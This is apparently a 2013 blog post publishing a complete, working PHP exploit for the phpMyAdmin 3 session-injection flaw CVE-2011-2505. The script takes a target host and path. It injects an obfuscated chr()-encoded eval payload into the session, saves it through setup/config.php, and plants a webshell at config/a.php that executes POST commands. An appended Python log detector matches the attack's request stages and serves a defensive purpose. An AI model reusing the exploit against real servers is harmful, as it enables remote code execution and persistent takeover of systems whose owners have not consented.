phpmyadmin3 remote code execute, PHP version exploit

Posted on 2013-2-21 09:13:03
Lately I have been a full-time stay-at-home dad, out of touch with the scene for many months, and my blog hasn't been updated either.

Last night I was up all night with the baby and saw Heige's discussion of the phpMyAdmin3 vulnerability in the php security group. I hadn't read the vulnerable code before, but a while ago I did see wofeiwo's exp on Weibo. According to Heige, though, there is a way to exploit it that isn't "jilei" (chicken ribs, i.e. useless), so during the night I dug out the code, studied it, and wrote this reheated exp. Since I got to it late and plenty of people had already studied it and written exps, mine counts as reheating leftovers; take it as a bit of research to pass the time.

First, kudos to wofeiwo's Python version of the exp, and kudos to the research spirit of wofeiwo and superhei, an example worth learning from. That earlier exp, however, has some limitations when used:
First, it requires session.auto_start = 1;
Second, in the default pma3 code the libraries directory is already access-controlled by .htaccess and cannot be accessed directly.
And of course there is a third point, a gap nobody can get across: the config directory must exist and be writable.

After reading Heige's remarks in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really isn't all that useless.

So I wrote this PHP version of the exp; the code is as follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net!
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 **/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')!==false){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
 **/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 **/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
 **/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')!==false){
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

/**
 * Send one raw HTTP/1.1 request to $host:80 and return the full response.
 * GET when $data is empty, POST (form-urlencoded) otherwise.
 **/
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
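From the defender's side, the three request stages the exploit above walks through (planting a value in $_SESSION via a GET parameter, having setup/config.php save it into config/config.inc.php, then fetching the written file) are easy to spot in a web server's access log. The following detector is an added example and is not part of the original post; the log format, rule names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# One Apache/nginx "combined"-style access-log line (constructed sample format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# The exploit's three stages, in order: inject into $_SESSION through a GET
# parameter (CVE-2011-2505), save it via setup/config.php, fetch the result.
RULES = [
    ("session-injection",  re.compile(r"_SESSION\[", re.I)),
    ("setup-config-write", re.compile(r"/setup/config\.php", re.I)),
    ("config-dir-access",  re.compile(r"/config/[^/?]*\.php", re.I)),
]
CHAIN = {name for name, _ in RULES}

def classify(line):
    """Return (client_ip, rule_name) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote(m.group("path"))          # payloads are usually URL-encoded
    for name, rx in RULES:
        if rx.search(path):
            return m.group("ip"), name
    return None

def scan(lines):
    """Group rule hits by client IP, keeping the order they were seen."""
    hits = {}
    for line in lines:
        r = classify(line)
        if r:
            hits.setdefault(r[0], []).append(r[1])
    return hits

def full_chain(hits):
    """IPs that completed all three stages: treat as a likely successful exploit."""
    return [ip for ip, names in hits.items() if CHAIN <= set(names)]

# Constructed sample traffic: one host running the full chain, one benign visitor.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/config/ HTTP/1.1" 403 214',
    '203.0.113.5 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/index.php HTTP/1.1" 200 4012',
    '203.0.113.5 - - [21/Feb/2013:09:13:05 +0800] "GET /pma/db_create.php?token=0123&session_to_unset=x'
    '&_SESSION%5BConfigFile%5D%5BServers%5D%5B*/x/*%5D%5Bhost%5D=x HTTP/1.1" 200 812',
    '203.0.113.5 - - [21/Feb/2013:09:13:06 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 120',
    '203.0.113.5 - - [21/Feb/2013:09:13:07 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 5',
    '198.51.100.7 - - [21/Feb/2013:09:20:00 +0800] "GET /pma/index.php?token=0123 HTTP/1.1" 200 4012',
]
```

A single session-injection hit is already worth an alert; the full chain from one IP means the post's precondition held (config/ existed and was writable), which is also the fix: remove that directory once setup is done.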